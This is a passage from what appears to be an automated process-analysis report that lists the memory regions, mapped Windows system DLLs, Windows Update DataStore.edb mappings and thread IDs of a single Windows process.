0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1354 start_va = 0x7ffc00760000 end_va = 0x7ffc007f7fff entry_point = 0x7ffc00760000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1355 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1356 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1357 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1358 start_va = 0x7ffc00920000 end_va = 0x7ffc00930fff entry_point = 0x7ffc00920000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1359 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1360 start_va = 0x7ffc00f70000 end_va = 0x7ffc00fb3fff entry_point = 0x7ffc00f70000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1361 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1362 start_va = 0x7ffc01080000 end_va = 0x7ffc010d3fff entry_point = 0x7ffc01080000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1363 start_va = 0x7ffc01190000 end_va = 0x7ffc01350fff entry_point = 0x7ffc01190000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1364 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1365 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1366 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1367 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1368 start_va = 0x7ffc01b20000 end_va = 0x7ffc01ce4fff entry_point = 0x7ffc01b20000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1369 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1370 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1371 start_va = 0x7ffc02050000 end_va = 0x7ffc02057fff entry_point = 0x7ffc02050000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1372 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1373 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1374 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1375 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1376 start_va = 0x7ffc03980000 end_va = 0x7ffc039e8fff entry_point = 0x7ffc03980000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1377 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1378 start_va = 0x7ffc03ae0000 end_va = 0x7ffc03b3afff entry_point = 0x7ffc03ae0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1379 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1380 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1381 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1382 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2071 start_va = 0x51ebae0000 end_va = 0x51ebbdffff entry_point = 0x0 region_type = private name = "private_0x00000051ebae0000" filename = "" Region: id = 2072 start_va = 0x51ebc00000 end_va = 0x51ebcfffff entry_point = 0x0 region_type = private name = "private_0x00000051ebc00000" filename = "" Region: id = 2073 start_va = 0x51ebd00000 end_va = 0x51ebdfffff entry_point = 0x0 region_type = private name = "private_0x00000051ebd00000" filename = "" Region: id = 2074 start_va = 0x7ff7b3aae000 end_va = 0x7ff7b3aaffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aae000" filename = "" Region: id = 2075 start_va = 0x7ffbeae00000 end_va = 0x7ffbeae4cfff entry_point = 0x7ffbeae00000 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 2076 start_va = 0x7ffbeae50000 end_va = 0x7ffbeaf71fff entry_point = 0x7ffbeae50000 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 2077 start_va = 0x7ffbebd70000 end_va = 0x7ffbebd7afff entry_point = 0x7ffbebd70000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 2078 start_va = 0x7ffbfb2c0000 end_va = 0x7ffbfb2c9fff entry_point = 0x7ffbfb2c0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 14156 start_va = 0x51e8230000 end_va = 0x51e8230fff entry_point = 0x51e8230000 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 14157 start_va = 0x51e8510000 end_va = 0x51e858ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8510000" filename = "" Region: id = 14158 start_va = 0x51ea500000 end_va = 0x51ea5fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea500000" filename = "" Region: id = 14159 start_va = 0x51ea600000 end_va = 0x51ea6fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea600000" filename = "" Region: id = 14160 start_va = 0x51eb7e0000 end_va = 0x51eb8dffff entry_point = 0x0 region_type = private name = "private_0x00000051eb7e0000" filename = "" Region: id = 14161 start_va = 0x51eb8e0000 end_va = 0x51eb9dffff entry_point = 0x0 region_type = private name = "private_0x00000051eb8e0000" filename = "" Region: id = 14162 start_va = 0x51ebe00000 end_va = 0x51ebefffff entry_point = 0x0 region_type = private name = "private_0x00000051ebe00000" filename = "" Region: id = 14163 start_va = 0x51ebf00000 end_va = 0x51ebffffff entry_point = 0x0 region_type = private name = "private_0x00000051ebf00000" filename = "" Region: id = 14164 start_va = 0x51ec000000 end_va = 0x51ec0fffff entry_point = 0x0 region_type = private name = "private_0x00000051ec000000" filename = "" Region: id = 14165 start_va = 0x51ec100000 end_va = 0x51ec1fffff entry_point = 0x0 region_type = private name = "private_0x00000051ec100000" filename = "" Region: id = 14166 start_va = 0x51ec300000 end_va = 0x51ec3fffff entry_point = 0x0 region_type = private name = "private_0x00000051ec300000" filename = "" Region: id = 14167 start_va = 0x51ec400000 end_va = 0x51ec4fffff entry_point = 0x0 region_type = private name = "private_0x00000051ec400000" filename = "" Region: id = 14168 start_va = 0x51ec500000 end_va = 0x51ec5fffff entry_point = 0x0 region_type = private name = "private_0x00000051ec500000" filename = "" Region: id = 14169 start_va = 0x7ff7b3a9e000 end_va = 0x7ff7b3a9ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3a9e000" filename = "" Region: id = 14170 start_va = 0x7ff7b3aa0000 end_va = 0x7ff7b3aa1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aa0000" filename = "" Region: id = 14171 start_va = 0x7ff7b3aa4000 end_va = 0x7ff7b3aa5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aa4000" filename = "" Region: id = 14172 start_va = 0x7ff7b3aa6000 end_va = 0x7ff7b3aa7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aa6000" filename = "" Region: id = 14173 start_va = 0x7ff7b3aa8000 end_va = 0x7ff7b3aa9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aa8000" filename = "" Region: id = 14174 start_va = 0x7ff7b3aaa000 end_va = 0x7ff7b3aabfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aaa000" filename = "" Region: id = 14175 start_va = 0x7ff7b3aac000 end_va = 0x7ff7b3aadfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aac000" filename = "" Region: id = 14176 start_va = 0x7ff7b3ab2000 end_va = 0x7ff7b3ab3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ab2000" filename = "" Region: id = 14177 start_va = 0x7ff7b3ab4000 end_va = 0x7ff7b3ab5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ab4000" filename = "" Region: id = 14178 start_va = 0x7ff7b3b22000 end_va = 0x7ff7b3b23fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b22000" filename = "" Region: id = 14179 start_va = 0x7ff7b3c5c000 end_va = 0x7ff7b3c5dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3c5c000" filename = "" Region: id = 14180 start_va = 0x7ffbea140000 end_va = 0x7ffbea369fff entry_point = 0x7ffbea140000 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 14181 start_va = 0x7ffbf7160000 end_va = 0x7ffbf7441fff entry_point = 0x7ffbf7160000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 15074 start_va = 0x51ec200000 end_va = 0x51ec2fffff entry_point = 0x0 region_type = private name = "private_0x00000051ec200000" filename = "" Region: id = 15075 start_va = 0x7ffbf6a30000 end_va = 0x7ffbf6a3ffff entry_point = 0x7ffbf6a30000 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 15400 start_va = 0x51e8050000 end_va = 0x51e8051fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8050000" filename = "" Region: id = 15401 start_va = 0x51e8060000 end_va = 0x51e8061fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8060000" filename = "" Region: id = 15402 start_va = 0x7ffbeb050000 end_va = 0x7ffbeb0a7fff entry_point = 0x7ffbeb050000 region_type = mapped_file name = "newdev.dll" filename = "\\Windows\\System32\\newdev.dll" (normalized: "c:\\windows\\system32\\newdev.dll") Region: id = 15403 start_va = 0x7ffbeb0b0000 end_va = 0x7ffbeb110fff entry_point = 0x7ffbeb0b0000 region_type = mapped_file name = "wuuhext.dll" filename = "\\Windows\\System32\\wuuhext.dll" (normalized: "c:\\windows\\system32\\wuuhext.dll") Region: id = 15404 start_va = 0x7ffbefdf0000 end_va = 0x7ffbefe73fff entry_point = 0x7ffbefdf0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 15405 start_va = 0x7ffbf6a20000 end_va = 0x7ffbf6a32fff entry_point = 0x7ffbf6a20000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 15406 start_va = 0x7ffbfb550000 end_va = 0x7ffbfb88cfff entry_point = 0x7ffbfb550000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 15407 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 15408 start_va = 0x51e8070000 end_va = 0x51e8076fff entry_point = 0x51e8070000 region_type = mapped_file name = "newdev.dll.mui" filename = "\\Windows\\System32\\en-US\\newdev.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\newdev.dll.mui") Region: id = 15409 start_va = 0x51e8080000 end_va = 0x51e8080fff entry_point = 0x0 region_type = private name = "private_0x00000051e8080000" filename = "" Region: id = 15410 start_va = 0x51e8090000 end_va = 0x51e8090fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8090000" filename = "" Region: id = 15411 start_va = 0x51e80a0000 end_va = 0x51e80a7fff entry_point = 0x0 region_type = private name = "private_0x00000051e80a0000" filename = "" Region: id = 15412 start_va = 0x51e80b0000 end_va = 0x51e80b6fff entry_point = 0x0 region_type = private name = "private_0x00000051e80b0000" filename = "" Region: id = 15413 start_va = 0x51e80c0000 end_va = 0x51e80cffff entry_point = 0x0 region_type = private name = "private_0x00000051e80c0000" filename = "" Region: id = 15414 start_va = 0x51e80d0000 end_va = 0x51e80dffff entry_point = 0x0 region_type = private name = "private_0x00000051e80d0000" filename = "" Region: id = 15415 start_va = 0x51e80e0000 end_va = 0x51e80e0fff entry_point = 0x0 region_type = private name = "private_0x00000051e80e0000" filename = "" Region: id = 15416 start_va = 0x51e8100000 end_va = 0x51e8100fff entry_point = 0x0 region_type = private name = "private_0x00000051e8100000" filename = "" Region: id = 15417 start_va = 0x51e8240000 end_va = 0x51e8280fff entry_point = 0x0 region_type = private name = "private_0x00000051e8240000" filename = "" Region: id = 15418 start_va = 0x51e8590000 end_va = 0x51e859ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8590000" filename = "" Region: id = 15419 start_va = 0x51e85a0000 end_va = 0x51e85affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e85a0000" filename = "" Region: id = 15420 start_va = 0x51e85b0000 end_va = 0x51e85bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e85b0000" filename = "" Region: id = 15421 start_va = 0x51e85c0000 end_va = 0x51e85cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e85c0000" filename = "" Region: id = 15422 start_va = 0x51e85d0000 end_va = 0x51e85dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e85d0000" filename = "" Region: id = 15423 start_va = 0x51e85e0000 end_va = 0x51e85effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e85e0000" filename = "" Region: id = 15424 start_va = 0x51e85f0000 end_va = 0x51e85f3fff entry_point = 0x0 region_type = private name = "private_0x00000051e85f0000" filename = "" Region: id = 15425 start_va = 0x51e8610000 end_va = 0x51e8611fff entry_point = 0x0 region_type = private name = "private_0x00000051e8610000" filename = "" Region: id = 15426 start_va = 0x51e8620000 end_va = 0x51e8620fff entry_point = 0x0 region_type = private name = "private_0x00000051e8620000" filename = "" Region: id = 15427 start_va = 0x51e8640000 end_va = 0x51e86bffff entry_point = 0x0 region_type = private name = "private_0x00000051e8640000" filename = "" Region: id = 15428 start_va = 0x51e86c0000 end_va = 0x51e86cffff entry_point = 0x0 region_type = private name = "private_0x00000051e86c0000" filename = "" Region: id = 15429 start_va = 0x51e86d0000 end_va = 0x51e86fffff entry_point = 0x0 region_type = private name = "private_0x00000051e86d0000" filename = "" Region: id = 15430 start_va = 0x51e8a00000 end_va = 0x51e8a7ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8a00000" filename = "" Region: id = 15431 start_va = 0x51e8b80000 end_va = 0x51e8bccfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8b80000" filename = "" Region: id = 15432 start_va = 0x51e8bd0000 end_va = 0x51e8bd7fff entry_point = 0x0 region_type = private name = "private_0x00000051e8bd0000" filename = "" Region: id = 15433 start_va = 0x51e8be0000 end_va = 0x51e8beffff entry_point = 0x51e8be0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 15434 start_va = 0x51e8bf0000 end_va = 0x51e8bfffff entry_point = 0x51e8bf0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 15435 start_va = 0x51e8d80000 end_va = 0x51e8dccfff entry_point = 0x0 region_type = private name = "private_0x00000051e8d80000" filename = "" Region: id = 15436 start_va = 0x51e8dd0000 end_va = 0x51e8ddffff entry_point = 0x51e8dd0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 15437 start_va = 0x51e8de0000 end_va = 0x51e8deffff entry_point = 0x51e8de0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 15438 start_va = 0x51e8df0000 end_va = 0x51e8dfffff entry_point = 0x51e8df0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 15439 start_va = 0x51e8e80000 end_va = 0x51e8e8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8e80000" filename = "" Region: id = 15440 start_va = 0x51e8e90000 end_va = 0x51e8e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8e90000" filename = "" Region: id = 15441 start_va = 0x51e8ea0000 end_va = 0x51e8eaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8ea0000" filename = "" Region: id = 15442 start_va = 0x51e8eb0000 end_va = 0x51e8ebffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8eb0000" filename = "" Region: id = 15443 start_va = 0x51e8ec0000 end_va = 0x51e8ecffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8ec0000" filename = "" Region: id = 15444 start_va = 0x51e8ed0000 end_va = 0x51e8edffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8ed0000" filename = "" Region: id = 15445 start_va = 0x51e8ee0000 end_va = 0x51e8eeffff entry_point = 0x51e8ee0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 15446 start_va = 0x51e8ef0000 end_va = 0x51e8efffff entry_point = 0x51e8ef0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 15447 start_va = 0x51ea160000 end_va = 0x51ea16ffff entry_point = 0x51ea160000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 15448 start_va = 0x51ea280000 end_va = 0x51ea28ffff entry_point = 0x51ea280000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 15449 start_va = 0x51ea290000 end_va = 0x51ea29ffff entry_point = 0x51ea290000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 15450 start_va = 0x51ea2a0000 end_va = 0x51ea2affff entry_point = 0x51ea2a0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 15451 start_va = 0x51ea2b0000 end_va = 0x51ea2bffff entry_point = 0x51ea2b0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 15452 start_va = 0x51ea2c0000 end_va = 0x51ea2cffff entry_point = 0x51ea2c0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 15453 start_va = 0x51ea2d0000 end_va = 0x51ea2dffff entry_point = 0x51ea2d0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 15454 start_va = 0x51ea2e0000 end_va = 0x51ea2effff entry_point = 0x51ea2e0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 15455 start_va = 0x51ea2f0000 end_va = 0x51ea2fffff entry_point = 0x51ea2f0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 15456 start_va = 0x51ea500000 end_va = 0x51ea5fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea500000" filename = "" Region: id = 15457 start_va = 0x51ea600000 end_va = 0x51ea6fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea600000" filename = "" Region: id = 15458 start_va = 0x51eae00000 end_va = 0x51eaefffff entry_point = 0x0 region_type = private name = "private_0x00000051eae00000" filename = "" Region: id = 15459 start_va = 0x51eb100000 end_va = 0x51eb17ffff entry_point = 0x0 region_type = private name = "private_0x00000051eb100000" filename = "" Region: id = 15460 start_va = 0x51eb180000 end_va = 0x51eb18ffff entry_point = 0x0 region_type = private name = "private_0x00000051eb180000" filename = "" Region: id = 15461 start_va = 0x51eb190000 end_va = 0x51eb19ffff entry_point = 0x0 region_type = private name = "private_0x00000051eb190000" filename = "" Region: id = 15462 start_va = 0x51eb1a0000 end_va = 0x51eb1affff entry_point = 0x0 region_type = private name = "private_0x00000051eb1a0000" filename = "" Region: id = 15463 start_va = 0x51eb1b0000 end_va = 0x51eb1bffff entry_point = 0x0 region_type = private name = "private_0x00000051eb1b0000" filename = "" Region: id = 15464 start_va = 0x51eb1c0000 end_va = 0x51eb1cffff entry_point = 0x0 region_type = private name = "private_0x00000051eb1c0000" filename = "" Region: id = 15465 start_va = 0x51eb2e0000 end_va = 0x51eb3dffff entry_point = 0x0 region_type = private name = "private_0x00000051eb2e0000" filename = "" Region: id = 15466 start_va = 0x51eb3e0000 end_va = 0x51eb4dffff entry_point = 0x0 region_type = private name = "private_0x00000051eb3e0000" filename = "" Region: id = 15467 start_va = 0x51eb4e0000 end_va = 0x51eb4e7fff entry_point = 0x0 region_type = private name = "private_0x00000051eb4e0000" filename = "" Region: id = 15468 start_va = 0x51eb4f0000 end_va = 0x51eb4fffff entry_point = 0x0 region_type = private name = "private_0x00000051eb4f0000" filename = "" Region: id = 15469 start_va = 0x51eb500000 end_va = 0x51eb5fffff entry_point = 0x0 region_type = private name = "private_0x00000051eb500000" filename = "" Region: id = 15470 start_va = 0x51ec500000 end_va = 0x51ed4fffff entry_point = 0x0 region_type = private name = "private_0x00000051ec500000" filename = "" Region: id = 15471 start_va = 0x51ed500000 end_va = 0x51f14fffff entry_point = 0x0 region_type = private name = "private_0x00000051ed500000" filename = "" Region: id = 15472 start_va = 0x51f1500000 end_va = 0x51f54fffff entry_point = 0x0 region_type = private name = "private_0x00000051f1500000" filename = "" Region: id = 15473 start_va = 0x7ff7b3b08000 end_va = 0x7ff7b3b09fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b08000" filename = "" Region: id = 15474 start_va = 0x7ff7b3b22000 end_va = 0x7ff7b3b23fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b22000" filename = "" Region: id = 15475 start_va = 0x7ff7b3c5c000 end_va = 0x7ff7b3c5dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3c5c000" filename = "" Region: id = 15476 start_va = 0x7ffbf2120000 end_va = 0x7ffbf2396fff entry_point = 0x7ffbf2120000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Thread: id = 51 os_tid = 0x274 Thread: id = 52 os_tid = 0x518 Thread: id = 53 os_tid = 0x820 Thread: id = 54 os_tid = 0xb0 Thread: id = 55 os_tid = 0xb88 Thread: id = 56 os_tid = 0xa1c Thread: id = 57 os_tid = 0xaf4 Thread: id = 58 os_tid = 0x8b8 Thread: id = 59 os_tid = 0xb68 Thread: id = 60 os_tid = 0x1f4 Thread: id = 61 os_tid = 0x42c Thread: id = 62 os_tid = 0x65c Thread: id = 63 os_tid = 0xbf4 Thread: id = 64 os_tid = 0xb44 Thread: id = 65 os_tid = 0x428 Thread: id = 66 os_tid = 0x450 Thread: id = 67 os_tid = 0x938 Thread: id = 68 os_tid = 0x310 Thread: id = 69 os_tid = 0x798 Thread: id = 70 os_tid = 0x878 Thread: id = 71 os_tid = 0x870 Thread: id = 72 os_tid = 0x784 Thread: id = 73 os_tid = 0x780 Thread: id = 74 os_tid = 0x754 Thread: id = 75 os_tid = 0x750 Thread: id = 76 os_tid = 0x740 Thread: id = 77 os_tid = 0x73c Thread: id = 78 os_tid = 0x738 Thread: id = 79 os_tid = 0x734 Thread: id = 80 os_tid = 0x688 Thread: id = 81 os_tid = 0x730 Thread: id = 82 os_tid = 0x724 Thread: id = 83 os_tid = 0x71c Thread: id = 84 os_tid = 0x70c Thread: id = 85 os_tid = 0x708 Thread: id = 86 os_tid = 0x6f4 Thread: id = 87 os_tid = 0x6ec Thread: id = 88 os_tid = 0x6d4 Thread: id = 89 